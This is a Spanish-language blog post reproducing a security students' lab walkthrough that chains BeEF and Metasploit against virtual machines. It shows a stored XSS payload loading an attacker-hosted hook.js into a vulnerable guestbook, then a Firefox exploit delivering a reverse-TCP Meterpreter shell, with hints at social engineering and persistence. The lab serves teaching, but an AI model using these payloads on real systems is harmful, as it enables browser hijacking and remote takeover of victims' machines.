1 nov 2012

Actividad Colaborativa 6 - Integracion BeEF con Metasploit


Los estudiantes de la Universidad Autonoma de Occidente que se encuntran realizando la especializacion en seguridad informatica han hecho este excelente trabajo sobre como podemos nosotros integrar BeEF con Metasploit. Los Destacados estudiantes son Antonio Rafael Gálvez Horna, Jesús Andrés Montoya Saavedra, Jorge Andrés Cultid Mejía.

Les transcribo entonces el trabajo realizado por ellos esperamos que lo aprovechen y aprendan arto.

*********************************************************************************************************************************

Integrando un Ataque utilizando BeEF y Metasploit
Escenario:

Para el siguiente ataque estamos utilizando un escenario controlado mediante la utilización de lo siguiente:
-        Maquina virtual Windows: Equipo Víctima
-        Máquina virtual BackTrack R3: Equipo del Atacante con herramientas para el objetivo
-        Máquina virtual BadStore 123s: Sitio Online de la Tienda Virtual vulnerable
Segmento de RED
Todas las máquinas virtuales comprenderán el segmento 192.168.0.0/24


Herramientas a Utilizar
-        BeEF
-        Metasploit
Alcance del Ataque
- Comprometer al Equipo Víctima

-     Explotar la vulnerabilidad XSS

-     Asegurar la permanencia
  •  Mediante los plugin de Metasploit que integramos en BeEF

EMPECEMOS
PASO 1:
Vamos a integrar BeEF con Metasploit, para ello necesitamos editar el archivo config.yaml ubicado en /pentest/web/beef

En la línea

metasploit:

            enable: true


Grabamos y luego nos dirigimos al directorio /pentest/web/beef/extensions/metasploit y editamos el archivo config.yaml

 
Modificamos las línea como se muestran a continuación, dando la IP de nuestra máquina que aloja BeEF, en este caso BT5R3, grabamos y salimos.


PASO 2

Una vez hecho las configuraciones en BeEF ejecutamos nuestro Metasploit de la siguiente manera:


Esperamos hasta que cargue por completo Metasploit y en la línea de comandos ejecutar lo siguiente:
 
msf> load msgrpc SeverHost=192.168.0.20 Pass=beef

Recuerden que la IP fue la que colocamos en el archive config.yaml y también seteamos nuestro password, en este caso “beef”
Listo ya tenemos los plugin a la espera de se utilizados en BeEF


PASO 3:

Ejecutamos BeEF de la siguiente manera:



En nuestro navegador ingresamos a la siguiente dirección URL para acceder al panel de control.



Como observamos nos hay ninguna máquina zombi.

PASO 4:

Hasta aquí tenemos casi el 40% de nuestro ataque, pero para concretarlo necesitamos una carnada, en este caso BADSTORE será el sitio ya que posee vulnerabilidades XSS en su codificación.

 
Bien vamos a ir al libro de visitas para firmar y a la vez cargar nuestro script “hook,js” (la carnada)
Manos a la obra <script src=http://ip_bactrack_beef:3000/hook.js></script>



PASO 5:

Pues aquí nos tocaría esperar que nuestra víctima firme el libro de visitas para que se convierta en zombi de nuestro BeEF


No tenemos tan mala suerte y una víctima procedió a firmar el libro de visitas, aquí se recomendaría publicitarlo por algún método de ingeniería social.

PASO 6:

De vuelta a nuestro panel de control de BeEF nos damos cuenta que ya tenemos objetivos zombis, nuestra víctima con IP 192.168.0.100



En la pestaña Detalles podemos revisar las características del sistema zombi, y con ello podremos enfocarnos en las vulnerabilidades que presenta el sistema objetivo.


PASO 7:
 
Ahora que tenemos más claro las características de nuestra víctima nos dirigimos a la pestaña de comandos  / Metasploit



Escogemos Mozilla Firefox Array.reduceRight() Integer Overflow y llenamos lo siguiente:

SRVHOST:       192.168.0.20 (ip de nuestra máquina BT)
SRVPORT:       8080
PAYLOAD:       windows/meterpreter/reverse_tcp
LPORT:            4444 (si estuviera ocupado escoger otro)
EXITFUNC:      process


PASO 8:

Nos dirigimos a la consola de Metasploit y nos damos cuenta que tenemos session.
Probamos con los comandos:

meterpreter>getuid
meterpreter>sysinfo


Como podemos observar que al tener session meterpreter podemos escalar privilegios y garantizar la conexión para no depender de BeEF, ya que cuando la víctima salga del sitio sabemos que perdemos la máquina zombi.

Espero les haya gustado.
 

*********************************************************************************************************************************

Si lo desean lo pueden Descargar en formato PDF desde acá.

Salud2
Th3h@Ck¡_@dM¡n

1 comentario:

Tus Comentarios son Importantes para Nosotros Siéntete Libre De Opinar